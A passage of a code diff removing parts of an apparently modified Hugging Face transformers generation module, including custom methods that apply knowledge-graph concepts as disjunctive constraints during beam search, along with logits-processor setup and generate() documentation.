"use_cache"] - encoder_kwargs = { - argument: value - for argument, value in model_kwargs.items() - if not any(argument.startswith(p) for p in irrelevant_prefix) - } - print('encoder_kwargs:', encoder_kwargs) - - # 3. 
make sure that encoder returns `ModelOutput` - model_input_name = model_input_name if model_input_name is not None else self.main_input_name - encoder_kwargs["return_dict"] = True - encoder_kwargs[model_input_name] = inputs_tensor - model_kwargs["encoder_outputs"]: ModelOutput = encoder(**encoder_kwargs) - - return model_kwargs - - def _prepare_decoder_input_ids_for_generation( - self, - batch_size: int, - decoder_start_token_id: int = None, - bos_token_id: int = None, - model_kwargs: Optional[Dict[str, torch.Tensor]] = None, - device: torch.device = None, - ) -> torch.LongTensor: - - if model_kwargs is not None and "decoder_input_ids" in model_kwargs: - return model_kwargs.pop("decoder_input_ids") - else: - decoder_start_token_id = self._get_decoder_start_token_id(decoder_start_token_id, bos_token_id) - if device is None: - device = self.device - return torch.ones((batch_size, 1), dtype=torch.long, device=device) * decoder_start_token_id - - def _get_decoder_start_token_id(self, decoder_start_token_id: int = None, bos_token_id: int = None) -> int: - decoder_start_token_id = ( - decoder_start_token_id if decoder_start_token_id is not None else self.config.decoder_start_token_id - ) - bos_token_id = bos_token_id if bos_token_id is not None else self.config.bos_token_id - - if decoder_start_token_id is not None: - return decoder_start_token_id - elif ( - hasattr(self.config, "decoder") - and hasattr(self.config.decoder, "decoder_start_token_id") - and self.config.decoder.decoder_start_token_id is not None - ): - return self.config.decoder.decoder_start_token_id - elif bos_token_id is not None: - return bos_token_id - elif ( - hasattr(self.config, "decoder") - and hasattr(self.config.decoder, "bos_token_id") - and self.config.decoder.bos_token_id is not None - ): - return self.config.decoder.bos_token_id - raise ValueError( - "`decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation." 
- ) - - @staticmethod - def _expand_inputs_for_generation( - input_ids: torch.LongTensor, - expand_size: int = 1, - is_encoder_decoder: bool = False, - attention_mask: Optional[torch.LongTensor] = None, - encoder_outputs: Optional[ModelOutput] = None, - **model_kwargs, - ) -> Tuple[torch.LongTensor, Dict[str, Any]]: - expanded_return_idx = ( - torch.arange(input_ids.shape[0]).view(-1, 1).repeat(1, expand_size).view(-1).to(input_ids.device) - ) - input_ids = input_ids.index_select(0, expanded_return_idx) - - if "token_type_ids" in model_kwargs: - token_type_ids = model_kwargs["token_type_ids"] - model_kwargs["token_type_ids"] = token_type_ids.index_select(0, expanded_return_idx) - - if attention_mask is not None: - model_kwargs["attention_mask"] = attention_mask.index_select(0, expanded_return_idx) - - if is_encoder_decoder: - if encoder_outputs is None: - raise ValueError("If `is_encoder_decoder` is True, make sure that `encoder_outputs` is defined.") - encoder_outputs["last_hidden_state"] = encoder_outputs.last_hidden_state.index_select( - 0, expanded_return_idx.to(encoder_outputs.last_hidden_state.device) - ) - model_kwargs["encoder_outputs"] = encoder_outputs - return input_ids, model_kwargs - - @staticmethod - def _update_model_kwargs_for_generation( - outputs: ModelOutput, model_kwargs: Dict[str, Any], is_encoder_decoder: bool = False - ) -> Dict[str, Any]: - # update past - if "past_key_values" in outputs: - model_kwargs["past"] = outputs.past_key_values - elif "mems" in outputs: - model_kwargs["past"] = outputs.mems - elif "past_buckets_states" in outputs: - model_kwargs["past"] = outputs.past_buckets_states - else: - model_kwargs["past"] = None - - # update token_type_ids with last value - if "token_type_ids" in model_kwargs: - token_type_ids = model_kwargs["token_type_ids"] - model_kwargs["token_type_ids"] = torch.cat([token_type_ids, token_type_ids[:, -1].unsqueeze(-1)], dim=-1) - - # update attention mask - if not is_encoder_decoder: - if "attention_mask" in model_kwargs: - attention_mask = model_kwargs["attention_mask"] - model_kwargs["attention_mask"] = torch.cat( - [attention_mask, attention_mask.new_ones((attention_mask.shape[0], 1))], dim=-1 - ) - - return model_kwargs - - def _reorder_cache(self, past, beam_idx): - raise NotImplementedError( - f"Make sure that a `_reorder_cache` function is correctly implemented in {self.__class__.__module__} to enable beam search for {self.__class__}" - ) - - def _get_logits_warper( - self, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - temperature: Optional[float] = None, - num_beams: Optional[int] = None, - renormalize_logits: Optional[bool] = None, - ) -> LogitsProcessorList: - """ - This class returns a [`LogitsProcessorList`] list object that contains all relevant [`LogitsWarper`] instances - used for multinomial sampling. 
- """ - - # init warp parameters - top_k = top_k if top_k is not None else self.config.top_k - top_p = top_p if top_p is not None else self.config.top_p - typical_p = typical_p if typical_p is not None else self.config.typical_p - temperature = temperature if temperature is not None else self.config.temperature - # instantiate warpers list - warpers = LogitsProcessorList() - - # the following idea is largely copied from this PR: https://github.com/huggingface/transformers/pull/5420/files - # all samplers can be found in `generation_utils_samplers.py` - if temperature is not None and temperature != 1.0: - warpers.append(TemperatureLogitsWarper(temperature)) - if top_k is not None and top_k != 0: - warpers.append(TopKLogitsWarper(top_k=top_k, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - if top_p is not None and top_p < 1.0: - warpers.append(TopPLogitsWarper(top_p=top_p, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - if typical_p is not None and typical_p < 1.0: - warpers.append(TypicalLogitsWarper(mass=typical_p, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - # `LogitNormalization` should always be the last logit processor, when present - if renormalize_logits is True: - warpers.append(LogitNormalization()) - return warpers - - def _get_logits_processor( - self, - repetition_penalty: float, - no_repeat_ngram_size: int, - encoder_no_repeat_ngram_size: int, - input_ids_seq_length: int, - encoder_input_ids: torch.LongTensor, - bad_words_ids: List[List[int]], - min_length: int, - max_length: int, - eos_token_id: int, - forced_bos_token_id: int, - forced_eos_token_id: int, - prefix_allowed_tokens_fn: Callable[[int, torch.Tensor], List[int]], - num_beams: int, - num_beam_groups: int, - diversity_penalty: float, - remove_invalid_values: bool, - exponential_decay_length_penalty: Tuple, - logits_processor: Optional[LogitsProcessorList], - renormalize_logits: Optional[bool], - ) -> LogitsProcessorList: - """ - This class returns a [`LogitsProcessorList`] list object that contains all relevant [`LogitsProcessor`] - instances used to modify the scores of the language model head. 
- """ - processors = LogitsProcessorList() - - # init warp parameters - repetition_penalty = repetition_penalty if repetition_penalty is not None else self.config.repetition_penalty - no_repeat_ngram_size = ( - no_repeat_ngram_size if no_repeat_ngram_size is not None else self.config.no_repeat_ngram_size - ) - encoder_no_repeat_ngram_size = ( - encoder_no_repeat_ngram_size - if encoder_no_repeat_ngram_size is not None - else self.config.encoder_no_repeat_ngram_size - ) - bad_words_ids = bad_words_ids if bad_words_ids is not None else self.config.bad_words_ids - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - diversity_penalty = diversity_penalty if diversity_penalty is not None else self.config.diversity_penalty - forced_bos_token_id = ( - forced_bos_token_id if forced_bos_token_id is not None else self.config.forced_bos_token_id - ) - forced_eos_token_id = ( - forced_eos_token_id if forced_eos_token_id is not None else self.config.forced_eos_token_id - ) - remove_invalid_values = ( - remove_invalid_values if remove_invalid_values is not None else self.config.remove_invalid_values - ) - exponential_decay_length_penalty = ( - exponential_decay_length_penalty - if exponential_decay_length_penalty is not None - else self.config.exponential_decay_length_penalty - ) - # instantiate processors list - - # the following idea is largely copied from this PR: https://github.com/huggingface/transformers/pull/5420/files - # all samplers can be found in `generation_utils_samplers.py` - if diversity_penalty is not None and diversity_penalty > 0.0: - processors.append( - HammingDiversityLogitsProcessor( - diversity_penalty=diversity_penalty, num_beams=num_beams, num_beam_groups=num_beam_groups - ) - ) - if repetition_penalty is not None and repetition_penalty != 1.0: - processors.append(RepetitionPenaltyLogitsProcessor(penalty=repetition_penalty)) - if no_repeat_ngram_size is not None and no_repeat_ngram_size > 0: - processors.append(NoRepeatNGramLogitsProcessor(no_repeat_ngram_size)) - if encoder_no_repeat_ngram_size is not None and encoder_no_repeat_ngram_size > 0: - if self.config.is_encoder_decoder: - processors.append(EncoderNoRepeatNGramLogitsProcessor(encoder_no_repeat_ngram_size, encoder_input_ids)) - else: - raise ValueError( - "It's impossible to use `encoder_no_repeat_ngram_size` with decoder-only architecture" - ) - if bad_words_ids is not None: - processors.append(NoBadWordsLogitsProcessor(bad_words_ids, eos_token_id)) - if min_length is not None and eos_token_id is not None and min_length > 0: - processors.append(MinLengthLogitsProcessor(min_length, eos_token_id)) - if prefix_allowed_tokens_fn is not None: - processors.append(PrefixConstrainedLogitsProcessor(prefix_allowed_tokens_fn, num_beams // num_beam_groups)) - if forced_bos_token_id is not None: - processors.append(ForcedBOSTokenLogitsProcessor(forced_bos_token_id)) - if forced_eos_token_id is not None: - processors.append(ForcedEOSTokenLogitsProcessor(max_length, forced_eos_token_id)) - if remove_invalid_values is True: - processors.append(InfNanRemoveLogitsProcessor()) - if exponential_decay_length_penalty is not None: - processors.append( - ExponentialDecayLengthPenalty(exponential_decay_length_penalty, eos_token_id, input_ids_seq_length) - ) - processors = self._merge_criteria_processor_list(processors, logits_processor) - # `LogitNormalization` should always be the last logit processor, when present - if renormalize_logits is True: - processors.append(LogitNormalization()) - return 
processors - - def _get_stopping_criteria( - self, max_length: Optional[int], max_time: Optional[float], stopping_criteria: Optional[StoppingCriteriaList] - ) -> StoppingCriteriaList: - criteria = StoppingCriteriaList() - if max_length is not None: - criteria.append(MaxLengthCriteria(max_length=max_length)) - if max_time is not None: - criteria.append(MaxTimeCriteria(max_time=max_time)) - criteria = self._merge_criteria_processor_list(criteria, stopping_criteria) - return criteria - - def _merge_criteria_processor_list( - self, - default_list: Union[LogitsProcessorList, StoppingCriteriaList], - custom_list: Union[LogitsProcessorList, StoppingCriteriaList], - ) -> Union[LogitsProcessorList, StoppingCriteriaList]: - if len(custom_list) == 0: - return default_list - for default in default_list: - for custom in custom_list: - if type(custom) is type(default): - object_type = "stopping criteria" if isinstance(custom, StoppingCriteria) else "logits processor" - raise ValueError( - f"A custom {object_type} of type {type(custom)} with values {custom} has been passed to `generate`, " - f"but it has already been created with the values {default}. {default} has been created by passing the " - "corresponding arguments to generate or by the model's config default values. " - f"If you just want to change the default values of {object_type} consider passing them as arguments " - f"to `generate` instead of using a custom {object_type}." - ) - default_list.extend(custom_list) - return default_list - - def compute_transition_beam_scores( - self, - sequences: torch.Tensor, - scores: Tuple[torch.Tensor], - beam_indices: torch.Tensor, - eos_token_id: int = None, - ): - """compute the transition probabilities of sequences given generation - scores and beam indices""" - - # reshape scores as [vocab_size * batch_size, # generation steps] - # with batch_size being 2 * vocab_size and # generation steps being - # seq_len - input_length - scores = torch.stack(scores).reshape(len(scores), -1).transpose(0, 1) - - # start of generated tokens - cut_idx = sequences.shape[-1] - scores.shape[-1] - # adjust for beam indices - beam_sequence_indices = torch.tensor(beam_indices, device=sequences.device) * self.config.vocab_size - # compute real indices - indices = sequences[:, cut_idx:] + beam_sequence_indices - # gather scores and run - transition_scores = scores.gather(0, indices) - # make sure that if EOS token was used before length of sequence `sequence.shape[-1]` - # get first occurence of EOS token - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - - if eos_token_id is not None: - is_eos_token_id = sequences[:, cut_idx:] == eos_token_id - # make sure first eos token still contributes to transition probs - is_eos_token_id[:, -1] = False - is_eos_token_id = is_eos_token_id.roll(1, -1) - # all indices after eos shoud be masked - zero_transition_prob_mask = is_eos_token_id.cumsum(-1).bool() - # zero out padded probs - transition_scores.masked_fill_(zero_transition_prob_mask, 0.0) - - return transition_scores - - # ADDED FRED - def remove_subsets(self, l): - #l = [[1, 2, 4, 8], [1, 2, 4, 5, 6], [1, 2, 3], [2, 3, 21], [1, 2, 3, 4], [1, 2, 3, 4, 5, 6, 7]] - l2 = l[:] - for m in l: - for n in l: - if set(m).issubset(set(n)) and m != n: - l2.remove(m) - break - return l2 - - # ADDED FRED - @torch.no_grad() - def cs_generate( - self, - inputs: Optional[torch.Tensor] = None, - contexts:List[str]=None, #input data - model_input:Dict=None, - max_length: Optional[int] = None, - min_length: 
Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None, - use_kg:bool=False, #added - relation_mapper_builder=None, - tokenizer=None, - max_neig_per_concept=1, #it slows down quite a lot - **model_kwargs, - ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]: - # print(model_input) - input_ids = model_input['input_ids'] - if "input_commonsense_relations" in model_input: - # print(model_input['input_commonsense_relations'].sum()) - model_kwargs["relation_inputs"] = model_input.get("input_commonsense_relations").to(input_ids.device) - if use_kg: - all_constraints = [] - print('contexts:', contexts[:3]) - for context in contexts: - constraints = [] - print('+++++++') - concepts_from_context = relation_mapper_builder.get_concepts_from_context(context=context, - clear_common_wds=True, alignment=1) - print('concepts_from_context:', concepts_from_context) - useful_concepts = [relation_mapper_builder.swow_knowledge.get_related_concepts(concept) for concept in - concepts_from_context] - if not useful_concepts: - useful_concepts = [relation_mapper_builder.knowledge.get_related_concepts(concept) for concept in concepts_from_context] - useful_concepts = [[f'{phrase}' for phrase in concepts] for concepts in useful_concepts] # add spaces - # useful_concepts = [[phrase for phrase in concepts if len(phrase.split(' ')) == 1] for concepts in useful_concepts] - # useful_concepts = list(itertools.chain.from_iterable(useful_concepts)) - # print('useful_concepts:', useful_concepts[:5]) - print('-------') - print('useful_concepts:', useful_concepts) - if concepts_from_context and useful_concepts: - for context_concept, neighbour_concepts in zip(concepts_from_context, useful_concepts): - print('neighbour:', neighbour_concepts[:5]) - # flexible_words = 
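-                    # Illustrative sketch (hypothetical concepts): for a context concept such as "dog",
-                    # `neighbour_concepts` might be ["bark", "leash"]; their token-id lists form the
-                    # disjunctive set handed to `DisjunctiveConstraint` below, so the constrained beam
-                    # search has to emit at least one of those neighbour phrases.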
self.most_similar_words(context_concept, neighbour_concepts) # limit the upperbound - # flexible_words = [word for word in flexible_words if word not in context_concept] # remove input concepts - flexible_words = [word for word in neighbour_concepts if - word not in context_concept] # remove input concepts - print('flexible_words:', flexible_words[:5]) - if not flexible_words: - continue - flexible_words_ids: List[List[int]] = tokenizer(flexible_words, add_special_tokens=False).input_ids #add_prefix_space=True, - flexible_words_ids = self.remove_subsets(flexible_words_ids) - # add_prefix_space=True - # flexible_words_ids = [x for x in flexible_words_ids if len(x) == 1] # problem with subsets - flexible_words_ids = flexible_words_ids[:max_neig_per_concept] - #print('flexible_words_ids:', flexible_words_ids[:3]) - constraint = DisjunctiveConstraint(flexible_words_ids) - constraints.append(constraint) - all_constraints.extend(constraints) - else: - all_constraints = None - - generated_answers_encoded = self.generate(input_ids=input_ids, - #attention_mask=model_input["attention_mask"].to(input_ids.device), - constraints=all_constraints, - min_length=min_length, - #max_length=max_length, - do_sample=do_sample, - early_stopping=early_stopping, - #num_beams=num_beams, - temperature=temperature, - top_k=top_k, - top_p=top_p, - # eos_token_id=tokenizer.eos_token_id, - no_repeat_ngram_size=no_repeat_ngram_size, - num_return_sequences=num_return_sequences, - return_dict_in_generate=return_dict_in_generate, - output_attentions=output_attentions, - output_scores=output_scores, - **model_kwargs, - ) - return generated_answers_encoded - - # ADDED FRED - @torch.no_grad() - def cs_simple_generate( - self, - inputs: Optional[torch.Tensor] = None, - neighbours_contexts:List[List[str]]=None, #input data - model_input:Dict=None, - max_length: Optional[int] = None, - min_length: Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - 
synced_gpus: Optional[bool] = False,
-        exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None,
-        use_kg: bool = False,  # added
-        relation_mapper_builder=None,
-        tokenizer=None,
-        max_concepts=2,  # it slows down quite a lot
-        **model_kwargs,
-    ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]:
-        # print(model_input)
-        input_ids = model_input['input_ids']
-        if use_kg:
-            all_constraints = []
-            for context_neighbours in neighbours_contexts:
-                # context_neighbours is a collection of concepts;
-                # let's create sub-collections of concepts
-                context_neighbours = [f' {concept}' for concept in context_neighbours if len(concept) > 3]
-                n_size_chunks = len(context_neighbours) // max_concepts
-                n_size_chunks = n_size_chunks if n_size_chunks > 0 else 1
-                sub_concepts_collection = list(get_jump_chunks(context_neighbours, jump=n_size_chunks))
-                constraints = []
-                for sub_concepts in sub_concepts_collection[:max_concepts]:
-                    flexible_words_ids: List[List[int]] = tokenizer(sub_concepts, add_special_tokens=False).input_ids  # add_prefix_space=True,
-                    # flexible_words_ids = self.remove_subsets(flexible_words_ids)
-                    # keep only the first sub-word id of each concept and deduplicate the resulting sets
-                    flexible_words_ids = [[word_ids[0]] for word_ids in flexible_words_ids]
-                    disjunctive_set = list(map(list, set(map(frozenset, flexible_words_ids))))
-
-                    # add_prefix_space=True
-                    # flexible_words_ids = [x for x in flexible_words_ids if len(x) == 1]  # problem with subsets
-                    # flexible_words_ids = flexible_words_ids[:max_neig_per_concept]
-                    # print('flexible_words_ids:', flexible_words_ids[:3])
-                    if not any(disjunctive_set):
-                        continue
-                    constraint = DisjunctiveConstraint(disjunctive_set)
-                    constraints.append(constraint)
-                if not any(constraints):
-                    constraints = None
-                all_constraints.append(constraints)
-        else:
-            all_constraints = None
-        if not all_constraints:
-            # fall back to unconstrained generation (constraints=None) for every example in the batch,
-            # so the per-example loop below does not iterate over `None`
-            all_constraints = [None] * input_ids.shape[0]
-
-        generated_answers_encoded = []
-        # print('all_constraints:', all_constraints)
-        for i, example_constraints in enumerate(all_constraints):
-            # print('example_constraints.token_ids:', [x.token_ids for x in example_constraints])
-            if "input_commonsense_relations" in model_input:
-                # print(model_input['input_commonsense_relations'].sum())
-                model_kwargs["relation_inputs"] = model_input.get("input_commonsense_relations")[i].unsqueeze(0).to(input_ids.device)
-            # print('model_kwargs.get("attention_mask"):', model_kwargs.get("attention_mask"))
-            model_kwargs["attention_mask"] = model_input.get("attention_mask")[i].unsqueeze(0).to(input_ids.device)
-            gen = self.generate(input_ids=input_ids[i].unsqueeze(0),
-                                constraints=example_constraints,
-                                min_length=min_length,
-                                # max_length=max_length,
-                                do_sample=do_sample,
-                                early_stopping=early_stopping,
-                                # num_beams=num_beams,
-                                temperature=temperature,
-                                top_k=top_k,
-                                top_p=top_p,
-                                # eos_token_id=tokenizer.eos_token_id,
-                                no_repeat_ngram_size=no_repeat_ngram_size,
-                                num_return_sequences=num_return_sequences,
-                                return_dict_in_generate=return_dict_in_generate,
-                                output_attentions=output_attentions,
-                                output_scores=output_scores,
-                                **model_kwargs)
-            # print('[gen]:', gen)
-            # print(tokenizer.batch_decode(gen))
-            generated_answers_encoded.append(gen[0].detach().cpu())
-        # torch.LongTensor(generated_answers_encoded)
-        # print('generated_answers_encoded:', generated_answers_encoded)
-        return torch.LongTensor(pad_sequence(generated_answers_encoded, batch_first=True, padding_value=tokenizer.pad_token_id)).to(input_ids.device)
-
-    @torch.no_grad()
-    def generate(
-        self,
-        inputs: Optional[torch.Tensor] = None,
-        max_length: Optional[int] = None,
-        min_length:
Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None, - **model_kwargs, - ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]: - r""" - - Generates sequences of token ids for models with a language modeling head. The method supports the following - generation methods for text-decoder, text-to-text, speech-to-text, and vision-to-text models: - - - *greedy decoding* by calling [`~generation_utils.GenerationMixin.greedy_search`] if `num_beams=1` and - `do_sample=False`. - - *multinomial sampling* by calling [`~generation_utils.GenerationMixin.sample`] if `num_beams=1` and - `do_sample=True`. - - *beam-search decoding* by calling [`~generation_utils.GenerationMixin.beam_search`] if `num_beams>1` and - `do_sample=False`. - - *beam-search multinomial sampling* by calling [`~generation_utils.GenerationMixin.beam_sample`] if - `num_beams>1` and `do_sample=True`. - - *diverse beam-search decoding* by calling [`~generation_utils.GenerationMixin.group_beam_search`], if - `num_beams>1` and `num_beam_groups>1`. - - *constrained beam-search decoding* by calling - [`~generation_utils.GenerationMixin.constrained_beam_search`], if `constraints!=None` or - `force_words_ids!=None`. - - - - Apart from `inputs`, all the arguments below will default to the value of the attribute of the same name as - defined in the model's config (`config.json`) which in turn defaults to the - [`~modeling_utils.PretrainedConfig`] of the model. - - - - Most of these parameters are explained in more detail in [this blog - post](https://huggingface.co/blog/how-to-generate). - - Parameters: - inputs (`torch.Tensor` of varying shape depending on the modality, *optional*): - The sequence used as a prompt for the generation or as model inputs to the encoder. 
If `None` the
-                method initializes it with `bos_token_id` and a batch size of 1. For decoder-only models `inputs`
-                should be in the format of `input_ids`. For encoder-decoder models *inputs* can represent any of
-                `input_ids`, `input_values`, `input_features`, or `pixel_values`.
-            max_length (`int`, *optional*, defaults to `model.config.max_length`):
-                The maximum length of the sequence to be generated.
-            max_new_tokens (`int`, *optional*, defaults to None):
-                The maximum number of tokens to generate, ignoring the number of tokens in the prompt. Use either
-                `max_new_tokens` or `max_length` but not both, they serve the same purpose.
-            min_length (`int`, *optional*, defaults to 10):
-                The minimum length of the sequence to be generated.
-            do_sample (`bool`, *optional*, defaults to `False`):
-                Whether or not to use sampling; use greedy decoding otherwise.
-            early_stopping (`bool`, *optional*, defaults to `False`):
-                Whether to stop the beam search when at least `num_beams` sentences are finished per batch or not.
-            num_beams (`int`, *optional*, defaults to 1):
-                Number of beams for beam search. 1 means no beam search.
-            temperature (`float`, *optional*, defaults to 1.0):
-                The value used to modulate the next token probabilities.
-            top_k (`int`, *optional*, defaults to 50):
-                The number of highest probability vocabulary tokens to keep for top-k-filtering.
-            top_p (`float`, *optional*, defaults to 1.0):
-                If set to float < 1, only the most probable tokens with probabilities that add up to `top_p` or higher
-                are kept for generation.
-            repetition_penalty (`float`, *optional*, defaults to 1.0):
-                The parameter for repetition penalty. 1.0 means no penalty. See [this
-                paper](https://arxiv.org/pdf/1909.05858.pdf) for more details.
-            pad_token_id (`int`, *optional*):
-                The id of the *padding* token.
-            bos_token_id (`int`, *optional*):
-                The id of the *beginning-of-sequence* token.
-            eos_token_id (`int`, *optional*):
-                The id of the *end-of-sequence* token.
-            length_penalty (`float`, *optional*, defaults to 1.0):
-                Exponential penalty to the length used with beam-based generation. It is applied as an exponent to
-                the sequence length, which in turn divides the score of the sequence. Since the score is the
-                log likelihood of the sequence (i.e. negative), `length_penalty` > 0.0 promotes longer sequences,
-                while `length_penalty` < 0.0 encourages shorter sequences.
-            no_repeat_ngram_size (`int`, *optional*, defaults to 0):
-                If set to int > 0, all ngrams of that size can only occur once.
-            encoder_no_repeat_ngram_size (`int`, *optional*, defaults to 0):
-                If set to int > 0, all ngrams of that size that occur in the `encoder_input_ids` cannot occur in the
-                `decoder_input_ids`.
-            bad_words_ids (`List[List[int]]`, *optional*):
-                List of token ids that are not allowed to be generated. In order to get the token ids of the words that
-                should not appear in the generated text, use `tokenizer(bad_words, add_prefix_space=True,
-                add_special_tokens=False).input_ids`.
-            force_words_ids (`List[List[int]]` or `List[List[List[int]]]`, *optional*):
-                List of token ids that must be generated. If given a `List[List[int]]`, this is treated as a simple
-                list of words that must be included, the opposite to `bad_words_ids`. If given `List[List[List[int]]]`,
-                this triggers a [disjunctive constraint](https://github.com/huggingface/transformers/issues/14081),
-                where one can allow different forms of each word.
-            num_return_sequences (`int`, *optional*, defaults to 1):
-                The number of independently computed returned sequences for each element in the batch.
- max_time(`float`, *optional*, defaults to None): - The maximum amount of time you allow the computation to run for in seconds. generation will still - finish the current pass after allocated time has been passed. - attention_mask (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values are in `[0, 1]`, 1 for tokens - that are not masked, and 0 for masked tokens. If not provided, will default to a tensor the same shape - as `input_ids` that masks the pad token. [What are attention masks?](../glossary#attention-mask) - decoder_start_token_id (`int`, *optional*): - If an encoder-decoder model starts decoding with a different token than *bos*, the id of that token. - use_cache: (`bool`, *optional*, defaults to `True`): - Whether or not the model should use the past last key/values attentions (if applicable to the model) to - speed up decoding. - num_beam_groups (`int`, *optional*, defaults to 1): - Number of groups to divide `num_beams` into in order to ensure diversity among different groups of - beams. [this paper](https://arxiv.org/pdf/1610.02424.pdf) for more details. - diversity_penalty (`float`, *optional*, defaults to 0.0): - This value is subtracted from a beam's score if it generates a token same as any beam from other group - at a particular time. Note that `diversity_penalty` is only effective if `group beam search` is - enabled. - prefix_allowed_tokens_fn (`Callable[[int, torch.Tensor], List[int]]`, *optional*): - If provided, this function constraints the beam search to allowed tokens only at each step. If not - provided no constraint is applied. This function takes 2 arguments: the batch ID `batch_id` and - `input_ids`. It has to return a list with the allowed tokens for the next generation step conditioned - on the batch ID `batch_id` and the previously generated tokens `inputs_ids`. This argument is useful - for constrained generation conditioned on the prefix, as described in [Autoregressive Entity - Retrieval](https://arxiv.org/abs/2010.00904). - logits_processor (`LogitsProcessorList`, *optional*): - Custom logits processors that complement the default logits processors built from arguments and a - model's config. If a logit processor is passed that is already created with the arguments or a model's - config an error is thrown. This feature is intended for advanced users. - renormalize_logits: (`bool`, *optional*, defaults to `False`): - Whether to renormalize the logits after applying all the logits processors or warpers (including the - custom ones). It's highly recommended to set this flag to `True` as the search algorithms suppose the - score logits are normalized but some logit processors or warpers break the normalization. - stopping_criteria (`StoppingCriteriaList`, *optional*): - Custom stopping criteria that complement the default stopping criteria built from arguments and a - model's config. If a stopping criteria is passed that is already created with the arguments or a - model's config an error is thrown. This feature is intended for advanced users. - constraints (`List[Constraint]`, *optional*): - Custom constraints that can be added to the generation to ensure that the output will contain the use - of certain tokens as defined by `Constraint` objects, in the most sensible way possible. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. 
